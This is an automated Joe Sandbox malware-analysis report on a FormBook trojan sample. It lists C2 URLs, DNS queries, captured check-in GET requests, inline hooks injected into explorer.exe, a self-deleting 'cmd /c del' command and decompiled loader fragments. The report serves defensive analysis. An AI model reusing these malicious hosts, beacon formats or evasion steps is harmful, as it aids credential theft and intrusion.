                          http://www.mtevz.online/ar73/rexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://www.authenticityhacking.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.1wwuwa.top/ar73/explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.echadholisticbar.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.comexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://www.arredobagno.clubexplorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.innovantexclusive.com/ar73/explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          34.102.136.180 | controlplus.systems | United States | 15169 | GOOGLEUS | false
                          Joe Sandbox Version:37.0.0 Beryl
                          Analysis ID:830326
                          Start date and time:2023-03-20 09:10:07 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 24s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:7pECKdsaig.exe
                          Original Sample Name:3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@6/1@4/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 66.3% (good quality ratio 61%)
                          • Quality average: 71.7%
                          • Quality standard deviation: 31.3%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 81
                          • Number of non-executed functions: 135
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          Time | Type | Description
                          09:11:24 | API Interceptor | 563x Sleep call for process: explorer.exe modified
                          Process:C:\Windows\explorer.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):984
                          Entropy (8bit):5.204081515204597
                          Encrypted:false
                          SSDEEP:24:Yq6CUXyhmQmnbNdB6hmxjmnz0JahmemnHZ6T06MhmDmnbxdB6hmktmn7KTdB6hm0:YqDUXyctnbNdUcAnz0JacPnHZ6T06McW
                          MD5:160494591DCB3DD4E2C36F71207A87F3
                          SHA1:D611935CA91C155B10A449DB72B3D5C8308A6EB7
                          SHA-256:B82EC6928AAA7C30ABBE26DF13CA514DC4508C704F03EB28A4B2ABE40F60DF6E
                          SHA-512:301BD7B6A4B7B2D3261C3A10FE98B2B4B811B861FCA077AF8732B7FCDFB2D106FFE82F0072CD859A4436E2EBD9347EACF44539E11AEAD2CA83703737B3030881
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3648731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3638731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3628731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3618731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3608731648,"LastSwitchedHighPart":30747937,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3598731648,"LastSwitchedHighPart":30747937,"PrePopulated":true}]}
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.393944417418745
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.98%
                          • DOS Executable Generic (2002/1) 0.02%
                          File name:7pECKdsaig.exe
                          File size:185856
                          MD5:515bf958f062fec724fbe6bdadf39485
                          SHA1:50fbaeb36e98338dc500e252855abf0152bb6bbf
                          SHA256:3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
                          SHA512:9b336130dc79e9dba0bdba735cc780c4c39148ca38668f660a6b6b15aeb0b8111a687ac4111a7c0bb84663b7c3ba963cefbf8fe4b4e4777fb5394b91d2272ed6
                          SSDEEP:3072:F3k9Eu2PDPlFm3TiZHhJmoapMZRrr9d+/eqeibwnFUMGBY8:MkQTeHlaGZRX9K4XeY8
                          TLSH:8904BF32D602C071F2B211B5F67D1B7B493D0E343295A4EAA7A225E06EF09E5B53931F
                          File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L....i.?............................@......................
                          Icon Hash:00828e8e8686b000
                          Entrypoint:0xfdf140
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0xfc0000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x3F0769F8 [Sun Jul 6 00:14:48 2003 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:
                          Programming Language:
                          • [C++] VS2010 SP1 build 40219
                          • [ASM] VS2010 SP1 build 40219
                          • [LNK] VS2010 SP1 build 40219
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x2d1a4 | 0x2d200 | False | 0.7623950398199446 | data | 7.409588215160137 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          03/20/23-09:12:27.000047 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49707 | 80 | 192.168.2.6 | 34.102.136.180
                          03/20/23-09:12:27.000047 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49707 | 80 | 192.168.2.6 | 34.102.136.180
                          03/20/23-09:12:27.000047 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49707 | 80 | 192.168.2.6 | 34.102.136.180
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Mar 20, 2023 09:12:03.883550882 CET | 192.168.2.6 | 8.8.8.8 | 0xb81b | Standard query (0) | www.mogi.africa | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:12:26.905668974 CET | 192.168.2.6 | 8.8.8.8 | 0x6157 | Standard query (0) | www.kellnovaglobalfood.info | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:12:47.423398018 CET | 192.168.2.6 | 8.8.8.8 | 0xddbb | Standard query (0) | www.controlplus.systems | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:18.738394976 CET | 192.168.2.6 | 8.8.8.8 | 0x9ab2 | Standard query (0) | www.quickhealcareltd.co.uk | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Mar 20, 2023 09:12:04.092940092 CET | 8.8.8.8 | 192.168.2.6 | 0xb81b | Server failure (2) | www.mogi.africa | none | none | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:12:26.958081961 CET | 8.8.8.8 | 192.168.2.6 | 0x6157 | No error (0) | www.kellnovaglobalfood.info | kellnovaglobalfood.info | | CNAME (Canonical name) | IN (0x0001) | false
                          Mar 20, 2023 09:12:26.958081961 CET | 8.8.8.8 | 192.168.2.6 | 0x6157 | No error (0) | kellnovaglobalfood.info | | 34.102.136.180 | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:12:47.469249010 CET | 8.8.8.8 | 192.168.2.6 | 0xddbb | No error (0) | www.controlplus.systems | controlplus.systems | | CNAME (Canonical name) | IN (0x0001) | false
                          Mar 20, 2023 09:12:47.469249010 CET | 8.8.8.8 | 192.168.2.6 | 0xddbb | No error (0) | controlplus.systems | | 34.102.136.180 | A (IP address) | IN (0x0001) | false
                          Mar 20, 2023 09:13:18.759357929 CET | 8.8.8.8 | 192.168.2.6 | 0x9ab2 | Name error (3) | www.quickhealcareltd.co.uk | none | none | A (IP address) | IN (0x0001) | false
                          • www.kellnovaglobalfood.info
                          • www.controlplus.systems
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.6 | 49707 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Mar 20, 2023 09:12:27.000046968 CET | 100 | OUT | GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1
                          Host: www.kellnovaglobalfood.info
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 20, 2023 09:12:27.245915890 CET | 101 | IN | HTTP/1.1 403 Forbidden
                          Server: openresty
                          Date: Mon, 20 Mar 2023 08:12:27 GMT
                          Content-Type: text/html
                          Content-Length: 291
                          ETag: "64063330-123"
                          Via: 1.1 google
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.6 | 49708 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                          Timestamp | kBytes transferred | Direction | Data
                          Mar 20, 2023 09:12:47.491030931 CET | 102 | OUT | GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1
                          Host: www.controlplus.systems
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Mar 20, 2023 09:12:47.672036886 CET | 103 | IN | HTTP/1.1 403 Forbidden
                          Server: openresty
                          Date: Mon, 20 Mar 2023 08:12:47 GMT
                          Content-Type: text/html
                          Content-Length: 291
                          ETag: "63fcb05a-123"
                          Via: 1.1 google
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                          Code Manipulations

                          Function Name | Hook Type | Active in Processes
                          PeekMessageA | INLINE | explorer.exe
                          PeekMessageW | INLINE | explorer.exe
                          GetMessageW | INLINE | explorer.exe
                          GetMessageA | INLINE | explorer.exe
                          Function Name | Hook Type | New Data
                          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE1
                          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE1
                          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xE1
                          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xE1

                          Target ID:0
                          Start time:09:11:04
                          Start date:20/03/2023
                          Path:C:\Users\user\Desktop\7pECKdsaig.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\7pECKdsaig.exe
                          Imagebase:0xa80000
                          File size:185856 bytes
                          MD5 hash:515BF958F062FEC724FBE6BDADF39485
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:low

                          Target ID:1
                          Start time:09:11:06
                          Start date:20/03/2023
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff647860000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:high

                          Target ID:2
                          Start time:09:11:16
                          Start date:20/03/2023
                          Path:C:\Windows\SysWOW64\msdt.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\msdt.exe
                          Imagebase:0xb60000
                          File size:1508352 bytes
                          MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Reputation:moderate

                          Target ID:8
                          Start time:09:11:25
                          Start date:20/03/2023
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:/c del "C:\Users\user\Desktop\7pECKdsaig.exe"
                          Imagebase:0x1b0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:9
                          Start time:09:11:25
                          Start date:20/03/2023
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6da640000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                            Execution Graph

                            Execution Coverage:5.3%
                            Dynamic/Decrypted Code Coverage:2.8%
                            Signature Coverage:5.9%
                            Total number of Nodes:563
                            Total number of Limit Nodes:64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 210 a8ace0-a8ad09 call a9cc40 213 a8ad0b-a8ad0e 210->213 214 a8ad0f-a8ad1d call a9d060 210->214 217 a8ad2d-a8ad3e call a9b490 214->217 218 a8ad1f-a8ad2a call a9d2e0 214->218 223 a8ad40-a8ad54 LdrLoadDll 217->223 224 a8ad57-a8ad5a 217->224 218->217 223->224
                            C-Code - Quality: 100%
                            			E00A8ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
                            				char* _v8;
                            				struct _EXCEPTION_RECORD _v12;
                            				struct _OBJDIR_INFORMATION _v16;
                            				char _v536;
                            				void* _t15;
                            				struct _OBJDIR_INFORMATION _t17;
                            				struct _OBJDIR_INFORMATION _t18;
                            				void* _t30;
                            				void* _t31;
                            				void* _t32;
                            
                            				_t24 = _a8;
                            				_v8 =  &_v536;
                            				_t15 = E00A9CC40( &_v12, 0x104, _a8);
                            				_t31 = _t30 + 0xc;
                            				if(_t15 != 0) {
                            					_t17 = E00A9D060(_v8, _t24, __eflags, _v8);
                            					_t32 = _t31 + 4;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						E00A9D2E0( &_v12, 0);
                            						_t32 = _t32 + 8;
                            					}
                            					_t18 = E00A9B490(_v8);
                            					_v16 = _t18;
                            					__eflags = _t18;
                            					if(_t18 == 0) {
                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                            						return _v16;
                            					}
                            					return _t18;
                            				} else {
                            					return _t15;
                            				}
                            			}














                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A8AD52
                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction ID: 9c4a0b7406a08fba48b912f08853abb1a43126f7fab7e228c5b72b6caf7b635f
                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction Fuzzy Hash: 730171B5E4020DABDF10EBE4DD42FDDB3B89B54308F0081A5E90997241F670EB54CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 225 a9a350-a9a3a1 call a9af50 NtCreateFile
                            C-Code - Quality: 100%
